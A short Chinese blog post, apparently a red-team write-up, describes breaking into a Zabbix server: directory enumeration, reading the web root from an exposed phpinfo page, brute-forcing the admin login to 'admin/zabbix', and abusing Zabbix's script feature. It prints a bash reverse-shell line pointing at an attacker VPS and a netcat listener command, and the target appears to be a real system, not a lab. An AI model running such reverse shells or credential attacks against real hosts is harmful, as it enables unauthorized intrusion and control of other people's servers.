前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >『实战渗透』Zabbix-弱口令再到命令执行Getshell

『实战渗透』Zabbix-弱口令再到命令执行Getshell

作者头像
Power7089
发布2020-02-18 12:33:49
1.3K0
发布2020-02-18 12:33:49
举报

saulGoodman

一个专注于红队攻防研究的公众号

关注

Zabbix-弱口令再到命令执行Getshell

信息搜集

先是枚举了一下目录:

得到了一些可利用的文件:

代码语言:javascript
复制
[06:13:52] 200 -   86KB - /phpinfo.php
[06:13:56] 200 -    2KB - /setup.php
[06:14:01] 200 -    2KB - /users.php

phpinfo中可以得到一些信息:用的是Linux操作系统:

通过DOCUMENT_ROOT函数得知网站的绝对路径是/opt/httpd-2.4.29/htdocs

接着来到:http://xx.xx.xx.xx/setup.php,是一个安装页面,不管他。要是我重新给他安装了web,我估计第二天就能去警察叔叔那里喝茶谈人生了

第三个页面是:http://xx.xx.xx.xx/users.php:

弱口令

掏出我的BurpSuite+大字典集合得到账号密码为:admin / zabbix 进入到了后台:

Getshell

在管理-脚本-创建脚本写入反弹shell命令:

代码语言:javascript
复制
bash -i >& /dev/tcp/VPS的IP/6666 0>&1

在监测-问题处打开一个主机,然后找到刚刚创建的脚本power-liu

这个时候我们的 VPS 用 nc 监听 :

代码语言:javascript
复制
nc -lvp 6666

即可成功反弹一枚 shell!

由于网络安全法的原因,我没深入!点到为止就好了!

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-02-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 小白帽学习之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 信息搜集
  • 弱口令
  • Getshell
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档